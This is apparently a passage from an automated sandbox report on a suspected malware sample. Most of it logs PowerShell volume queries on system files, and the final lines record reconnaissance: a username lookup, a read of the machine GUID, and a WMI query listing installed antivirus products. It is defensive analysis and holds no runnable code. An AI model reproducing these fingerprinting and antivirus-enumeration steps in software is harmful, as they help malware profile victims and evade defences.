Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00431442 GetUserNameA, 14_2_00431442
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct